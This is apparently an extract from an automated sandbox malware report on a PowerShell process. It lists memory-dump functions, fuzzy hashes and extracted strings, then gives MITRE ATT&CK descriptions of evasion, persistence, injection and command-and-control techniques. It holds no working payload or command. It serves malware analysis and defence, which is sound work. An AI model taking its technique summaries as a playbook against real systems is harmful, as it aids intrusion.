Source File: 0000000C.00000002.2266456275.0000000004860000.00000040.00000800.00020000.00000000.sdmp, Offset: 04860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_4860000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf04fdb8f660a13058958582365a3e3ae8803d165d9e9dd1d6c07c2efe028dae
Instruction ID: 97d729a241f6b8e129b90519a3ba03f23e73742113c0d0cb6d89a58c9ca979de
Opcode Fuzzy Hash: bf04fdb8f660a13058958582365a3e3ae8803d165d9e9dd1d6c07c2efe028dae
Instruction Fuzzy Hash: C6E0DF3080810E9BCB08ABB0D85A4EDFFB0FE10300B8006DCD9A742082EA611A47CBC1

Function 04868800 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2266456275.0000000004860000.00000040.00000800.00020000.00000000.sdmp, Offset: 04860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_4860000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c6e8d53bfa2ac55ce462141c689811b136f1e877c56d516370cc3a4c829f2fd1
Instruction ID: 20ab8ac41642bd4286794485edbf92cdef25cae86f4a219e634f0abc80072c1a
Opcode Fuzzy Hash: c6e8d53bfa2ac55ce462141c689811b136f1e877c56d516370cc3a4c829f2fd1
Instruction Fuzzy Hash: 02E09A34A0824A9B8B59DBB8D44686EBFF0EB46204B1042ADE98B87202D6310806CF81

Function 0486F870 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2266456275.0000000004860000.00000040.00000800.00020000.00000000.sdmp, Offset: 04860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_4860000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
Instruction ID: 66bb78aceab08371a59a4e88249a7868e01022937b19ff3535ffc60dce957355
Opcode Fuzzy Hash: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
Instruction Fuzzy Hash: 95D04C70D042099F8780EFAD994156DFBF4AB48204B5085AA8919E7201E63196129BD1

Function 04868748 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2266456275.0000000004860000.00000040.00000800.00020000.00000000.sdmp, Offset: 04860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_4860000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ce9f2ec3e31e6035b8100b7f6cad60974c9bc5bbf8b942827294c2d6b4cf1250
Instruction ID: 5cdf452aba8a39c2cc53f7b2854a007d20004f101eb55a48e5bfa1c9f6010d1a
Opcode Fuzzy Hash: ce9f2ec3e31e6035b8100b7f6cad60974c9bc5bbf8b942827294c2d6b4cf1250
Instruction Fuzzy Hash: 5AD0173080911D8BCB18ABA4E81A4BDBB34FA00301F8002ADDA1792191EF722A4ACAD0

Function 04868810 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2266456275.0000000004860000.00000040.00000800.00020000.00000000.sdmp, Offset: 04860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_4860000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 169a995b6d3725555d004454a53c7420a7c82c9e876e7735ae27e52013061fd0
Instruction ID: 2d7b26b53ddd73fd9af954aaa2202846e58842ab393729daa992e40c46c31627
Opcode Fuzzy Hash: 169a995b6d3725555d004454a53c7420a7c82c9e876e7735ae27e52013061fd0
Instruction Fuzzy Hash: 34D01734A0820E8B8B58EFA4E84687EBBB4EB44304F0041A9E94A93344EA706901CBC1

Function 0486EA57 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2266456275.0000000004860000.00000040.00000800.00020000.00000000.sdmp, Offset: 04860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_4860000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 838df145a0101905e11d1a430d63bd802beb0bfb1c03b538f82fa67d5e159fc8
Instruction ID: c5db206786554c1c76fdd2ce63bc4af58d7ddd2dd178f17dd2a2faa525c2ad60
Opcode Fuzzy Hash: 838df145a0101905e11d1a430d63bd802beb0bfb1c03b538f82fa67d5e159fc8
Instruction Fuzzy Hash: FDD09239B44218CFCB14CB94E895A9CF371FF84325F5485A9E916AB251CB32A916CB40

Function 04867E90 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2266456275.0000000004860000.00000040.00000800.00020000.00000000.sdmp, Offset: 04860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_4860000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 58d63a87b8e5b7904fdd794fb131b1477a5de563d7d530ca7ea00e0cb5f99b0e
Instruction ID: c93ff67a126694d8999370fd43472e05936c075044203110ef38d5930dafe2b0
Opcode Fuzzy Hash: 58d63a87b8e5b7904fdd794fb131b1477a5de563d7d530ca7ea00e0cb5f99b0e
Instruction Fuzzy Hash: 2EC0021445E3C00EEB43837588A56127FBA1A83119B1A41DAD092CA8A3C5B8894AD753

Function 04867920 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2266456275.0000000004860000.00000040.00000800.00020000.00000000.sdmp, Offset: 04860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_4860000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6fe9deabc3fc0f4d831a112668f8f4f6b42817cb58bdb35ffffd1e40375c85e3
Instruction ID: 2b471c58f1cc940493dc54155853ac3b3cba1be5551c45be210fc9cef0367d40
Opcode Fuzzy Hash: 6fe9deabc3fc0f4d831a112668f8f4f6b42817cb58bdb35ffffd1e40375c85e3
Instruction Fuzzy Hash: 5CC08C340493849FCB25EB78E0548583F61EF0216D32145DCE88B0F6B3CA72844ACF06

Function 04867928 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2266456275.0000000004860000.00000040.00000800.00020000.00000000.sdmp, Offset: 04860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_4860000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 75321b5f38e49645aa07dcf8ca3bbb8a0d908b46b7f55635aeb9debd33bd5ced
Instruction ID: 4fa9fd5481633bc1ae07836c175465acea71b1d07646a3da7b7f29e9dcd9d198
Opcode Fuzzy Hash: 75321b5f38e49645aa07dcf8ca3bbb8a0d908b46b7f55635aeb9debd33bd5ced
Instruction Fuzzy Hash: ECB092300447088FC2586F79A4048147729FB4522938044ECE94F0A6928E36E889CA49

Non-executed Functions

Function 07711BE0 Relevance: 20.4, Strings: 16, Instructions: 411COMMON

Download Yara Rule

Strings

$cGk, xrefs: 077120B4
4']q, xrefs: 07711F95
4']q, xrefs: 07711F89
tP]q, xrefs: 07711FDF
rTl, xrefs: 07711C53
JUl, xrefs: 077120C2
rTl, xrefs: 07711C5D
84Rl, xrefs: 07711F76
JUl, xrefs: 077120CE
JUl, xrefs: 0771200B
4']q, xrefs: 07711C92
JUl, xrefs: 07712017
JUl, xrefs: 07711FA1
84Rl, xrefs: 07711F6C
4']q, xrefs: 07711C86
tP]q, xrefs: 07711FEB

Memory Dump Source

Source File: 0000000C.00000002.2297018551.0000000007710000.00000040.00000800.00020000.00000000.sdmp, Offset: 07710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7710000_powershell.jbxd

Similarity

API ID:
String ID: $cGk$4']q$4']q$4']q$4']q$84Rl$84Rl$tP]q$tP]q$JUl$JUl$JUl$JUl$JUl$rTl$rTl
API String ID: 0-1556152091
Opcode ID: 41e91758ad0de64c04a16ffb49355367350129e1b68dbea18559d040d7c9b886
Instruction ID: 1996fb84b964c9e5542c329fbb9cb977a2aa03784bf6074aa88d0283b0bd4fab
Opcode Fuzzy Hash: 41e91758ad0de64c04a16ffb49355367350129e1b68dbea18559d040d7c9b886
Instruction Fuzzy Hash: DBD138B5B0430A8FCB248B6C94406AABBF6EFC1351F58C9ABC645CF256DB31C855C7A1

Function 07713928 Relevance: 12.8, Strings: 10, Instructions: 327COMMON

Download Yara Rule

Strings

4']q, xrefs: 07713B35
tP]q, xrefs: 077139A5
tP]q, xrefs: 077139B1
$]q, xrefs: 07713C0E
4']q, xrefs: 07713B29
$]q, xrefs: 07713960
Jl, xrefs: 07713A0F
$]q, xrefs: 0771393A
Jl, xrefs: 07713A1D
$]q, xrefs: 0771396C

Memory Dump Source

Source File: 0000000C.00000002.2297018551.0000000007710000.00000040.00000800.00020000.00000000.sdmp, Offset: 07710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7710000_powershell.jbxd

Similarity

API ID:
String ID: 4']q$4']q$tP]q$tP]q$$]q$$]q$$]q$$]q$Jl$Jl
API String ID: 0-3077390536
Opcode ID: ba849df4b7eada2dbbb4c076eb2f85e3d2424e06e5cb071f18713c60a8ac7d78
Instruction ID: 2d0c9e96f9a06452d71dec26b31d7a88a3b79b6aaba59cc885c62a66dd0c14d9
Opcode Fuzzy Hash: ba849df4b7eada2dbbb4c076eb2f85e3d2424e06e5cb071f18713c60a8ac7d78
Instruction Fuzzy Hash: D6A178B13043159FDB248B7D9841B66BFF6EFC6790F1888AED445CB292DA36C845C3A1

Function 07710FA1 Relevance: 12.7, Strings: 10, Instructions: 189COMMON

Download Yara Rule

Strings

84Rl, xrefs: 077110D4
$]q, xrefs: 07711229
$]q, xrefs: 07711044
`Q]q, xrefs: 077110ED
fbq, xrefs: 077110A2
`Q]q, xrefs: 07711153
$]q, xrefs: 07711253
tP]q, xrefs: 07711127
$]q, xrefs: 07711081
$]q, xrefs: 07711065

Memory Dump Source

Source File: 0000000C.00000002.2297018551.0000000007710000.00000040.00000800.00020000.00000000.sdmp, Offset: 07710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7710000_powershell.jbxd

Similarity

API ID:
String ID: fbq$84Rl$`Q]q$`Q]q$tP]q$$]q$$]q$$]q$$]q$$]q
API String ID: 0-3663376110
Opcode ID: 41f0dcbcd85b442e21a5d7ef8c5441e0c399e1ffd628d4be7777db9a1c9a1815
Instruction ID: b83cf36c70e666154e65e6e53a9e4dfbd9c14549728359bc37f836dfaffabde3
Opcode Fuzzy Hash: 41f0dcbcd85b442e21a5d7ef8c5441e0c399e1ffd628d4be7777db9a1c9a1815
Instruction Fuzzy Hash: 0A71A1B0A1420EDFDB28CE0CC544BAAB7F2BF45381F958895EA019F294C375DD84CBA1

Function 0486EBB8 Relevance: 10.2, Strings: 8, Instructions: 181COMMON

Download Yara Rule

Strings

0o@p, xrefs: 0486ED47
$]q, xrefs: 0486ED21
$]q, xrefs: 0486ED07
$]q, xrefs: 0486ED55
$]q, xrefs: 0486ED3B
,aq, xrefs: 0486EC0D
$]q, xrefs: 0486ED6F
$]q, xrefs: 0486ECB0

Memory Dump Source

Source File: 0000000C.00000002.2266456275.0000000004860000.00000040.00000800.00020000.00000000.sdmp, Offset: 04860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_4860000_powershell.jbxd

Similarity

API ID:
String ID: ,aq$0o@p$$]q$$]q$$]q$$]q$$]q$$]q
API String ID: 0-3294546130
Opcode ID: 61261e7c78b990bfcb8d531135a1d1b919725dbac2e6b7d029b28d7455e529e5
Instruction ID: 9439895aa9f8b3d51b8ebe1d9f51dce0eafd61e92b697221459fc18a610fab7b
Opcode Fuzzy Hash: 61261e7c78b990bfcb8d531135a1d1b919725dbac2e6b7d029b28d7455e529e5
Instruction Fuzzy Hash: 6E5181383844148FCB69AB7D989493C3BD7AF897543100EAAD517CB3B1EE58EC41CB62

Function 0486EDE8 Relevance: 9.2, Strings: 7, Instructions: 452COMMON

Download Yara Rule

Strings

`Q]q, xrefs: 0486F2FC
$]q, xrefs: 0486F110
$]q, xrefs: 0486F326
0o@p, xrefs: 0486F205
0o@p, xrefs: 0486F243
$]q, xrefs: 0486F16C
0o@p, xrefs: 0486F237

Memory Dump Source

Source File: 0000000C.00000002.2266456275.0000000004860000.00000040.00000800.00020000.00000000.sdmp, Offset: 04860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_4860000_powershell.jbxd

Similarity

API ID:
String ID: 0o@p$0o@p$0o@p$`Q]q$$]q$$]q$$]q
API String ID: 0-2772630205
Opcode ID: 55e135fa7109deee1ebb27179ae83c3f740fe4cb7fb1ada585cd877704bbb011
Instruction ID: 114f38c11aae2a06cfe889fa99c33fb0b6f65824204c6c9f46dc39d48b3688f0
Opcode Fuzzy Hash: 55e135fa7109deee1ebb27179ae83c3f740fe4cb7fb1ada585cd877704bbb011
Instruction Fuzzy Hash: 0EE126347401108FDB549B7CA81463E37DB9FC9714B2449AADA07DF369EE74EC018792

Function 07713678 Relevance: 8.9, Strings: 7, Instructions: 192COMMON

Download Yara Rule

Strings

$]q, xrefs: 07713836
Jl, xrefs: 0771387B
Jl, xrefs: 0771386D
$]q, xrefs: 0771382A
4']q, xrefs: 07713722
$]q, xrefs: 077137FF
4']q, xrefs: 0771372E

Memory Dump Source

Source File: 0000000C.00000002.2297018551.0000000007710000.00000040.00000800.00020000.00000000.sdmp, Offset: 07710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7710000_powershell.jbxd

Similarity

API ID:
String ID: 4']q$4']q$$]q$$]q$$]q$Jl$Jl
API String ID: 0-97210084
Opcode ID: 672bd53e4bc2a8b98bcee38074b8c5c53de0976039b3f38fb9d072ff282e4155
Instruction ID: 11f0a99a8ea45e692ea1ce019452bb8540df105573562bcab964d6a0712457cd
Opcode Fuzzy Hash: 672bd53e4bc2a8b98bcee38074b8c5c53de0976039b3f38fb9d072ff282e4155
Instruction Fuzzy Hash: D35185F17043068FDB244B6C8840766BFE6AFC36A1F28887BD845CB652DB35C841C7A2

Function 07712107 Relevance: 8.9, Strings: 7, Instructions: 113COMMON

Download Yara Rule

Strings

$]q, xrefs: 07712166
TcGk, xrefs: 077121F2
$]q, xrefs: 07712172
JUl, xrefs: 0771214A
JUl, xrefs: 07712156
JUl, xrefs: 077121C4
JUl, xrefs: 077121BA

Memory Dump Source

Source File: 0000000C.00000002.2297018551.0000000007710000.00000040.00000800.00020000.00000000.sdmp, Offset: 07710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7710000_powershell.jbxd

Similarity

API ID:
String ID: TcGk$$]q$$]q$JUl$JUl$JUl$JUl
API String ID: 0-2711788700
Opcode ID: 12e42af43cc92c66d30dd97d20c42bfb58ab78b820da9e47e2721bcbef8ccb80
Instruction ID: 24ef8274cabd258befb7d342cd0a483cdd10538c93ad4bbd9c055039a0980a44
Opcode Fuzzy Hash: 12e42af43cc92c66d30dd97d20c42bfb58ab78b820da9e47e2721bcbef8ccb80
Instruction Fuzzy Hash: 1A3120B670D3808FC326873C9C50552BFB6FF9369071A89EBC2808F567D6318856C362

Function 04867A09 Relevance: 6.5, Strings: 5, Instructions: 240COMMON

Download Yara Rule

Strings

`^q, xrefs: 04867C2C
`^q, xrefs: 04867CAA
tMTl, xrefs: 04867ABC
`^q, xrefs: 04867B8A
`^q, xrefs: 04867B0B

Memory Dump Source

Source File: 0000000C.00000002.2266456275.0000000004860000.00000040.00000800.00020000.00000000.sdmp, Offset: 04860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_4860000_powershell.jbxd

Similarity

API ID:
String ID: tMTl$`^q$`^q$`^q$`^q
API String ID: 0-1660071224
Opcode ID: 8329e29056841f5af5880297b5317e42a02d271b8476a20142752aaf6c8598ca
Instruction ID: 45dc4f57a296deb1fdb80a7d5e9733684320e11bfc24c88a18cfa2fde31c2b65
Opcode Fuzzy Hash: 8329e29056841f5af5880297b5317e42a02d271b8476a20142752aaf6c8598ca
Instruction Fuzzy Hash: 35B1A274E012099FDB54DFA9D990A9DFBF6FF88304F10862AD819AB314DB34A905CF90

Function 04867A18 Relevance: 6.5, Strings: 5, Instructions: 234COMMON

Download Yara Rule

Strings

`^q, xrefs: 04867C2C
`^q, xrefs: 04867CAA
tMTl, xrefs: 04867ABC
`^q, xrefs: 04867B8A
`^q, xrefs: 04867B0B

Memory Dump Source

Source File: 0000000C.00000002.2266456275.0000000004860000.00000040.00000800.00020000.00000000.sdmp, Offset: 04860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_4860000_powershell.jbxd

Similarity

API ID:
String ID: tMTl$`^q$`^q$`^q$`^q
API String ID: 0-1660071224
Opcode ID: 9c84acba2275732d34883531c52c17a2b4e17c201f7fb81dec79c11a8d4d8abb
Instruction ID: 58d3b9b68b0d73b19872cfc5ae9c5910b6f4430e647304c4fa6d4f8894c3b43e
Opcode Fuzzy Hash: 9c84acba2275732d34883531c52c17a2b4e17c201f7fb81dec79c11a8d4d8abb
Instruction Fuzzy Hash: 7DB1A274E012199FDB54DFA9D990A9DFBF6FF88304F108629E819AB314DB34A905CF90

Function 07712207 Relevance: 6.3, Strings: 5, Instructions: 77COMMON

Download Yara Rule

Strings

JUl, xrefs: 077122A4
lcGk, xrefs: 07712237
JUl, xrefs: 07712251
JUl, xrefs: 07712245
JUl, xrefs: 0771229A

Memory Dump Source

Source File: 0000000C.00000002.2297018551.0000000007710000.00000040.00000800.00020000.00000000.sdmp, Offset: 07710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7710000_powershell.jbxd

Similarity

API ID:
String ID: lcGk$JUl$JUl$JUl$JUl
API String ID: 0-2725401659
Opcode ID: 917bf83e28105984fc9243d7532940daa0d0436f8bf80af14b092a93da54245b
Instruction ID: 6b6132d7826bbeceadcc36dda125107334e3ba27c77681c3767f42fb1f8c2cda
Opcode Fuzzy Hash: 917bf83e28105984fc9243d7532940daa0d0436f8bf80af14b092a93da54245b
Instruction Fuzzy Hash: 5F2146B570C3915FC316473C4821AA63FB6AFD3650B0B88DBC0808F6A7C9258C66C3A7

Function 0771030A Relevance: 6.3, Strings: 5, Instructions: 74COMMON

Download Yara Rule

Strings

4']q, xrefs: 07710373
4']q, xrefs: 077102EB
$]q, xrefs: 07710352
$]q, xrefs: 0771035E
4']q, xrefs: 0771037F

Memory Dump Source

Source File: 0000000C.00000002.2297018551.0000000007710000.00000040.00000800.00020000.00000000.sdmp, Offset: 07710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7710000_powershell.jbxd

Similarity

API ID:
String ID: 4']q$4']q$4']q$$]q$$]q
API String ID: 0-451802133
Opcode ID: e533e49f849c4ac7030dc942db1d33be472addfbc4541a4b144cfe824ba30e4b
Instruction ID: d0a6f69ca3e0d9f8376ab4375cab6d0f47e3b8f1ac434dc209e6291e71bb24ae
Opcode Fuzzy Hash: e533e49f849c4ac7030dc942db1d33be472addfbc4541a4b144cfe824ba30e4b
Instruction Fuzzy Hash: 3211087170D3954FC72A122C39211AA6FF65FC36A172948DBC484CB256CD154C8AC3A3

Function 07715798 Relevance: 5.1, Strings: 4, Instructions: 94COMMON

Download Yara Rule

Strings

$]q, xrefs: 077157F4
$]q, xrefs: 07715800
$]q, xrefs: 077157AA
$]q, xrefs: 077157C6

Memory Dump Source

Source File: 0000000C.00000002.2297018551.0000000007710000.00000040.00000800.00020000.00000000.sdmp, Offset: 07710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7710000_powershell.jbxd

Similarity

API ID:
String ID: $]q$$]q$$]q$$]q
API String ID: 0-858218434
Opcode ID: 840ae89db3287dae51deb1c38da969726b0d666dd83b7ca7dd55e4148d6a194e
Instruction ID: 77ca7701725d68b68f5c50653230af5e536de6fd4fb68cec2c3d1382e08b4aa4
Opcode Fuzzy Hash: 840ae89db3287dae51deb1c38da969726b0d666dd83b7ca7dd55e4148d6a194e
Instruction Fuzzy Hash: 9C2147B13143029BDB3C5A2E9841B7BB7DAAFC0791F64883A9905CB681DE75C9518361

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

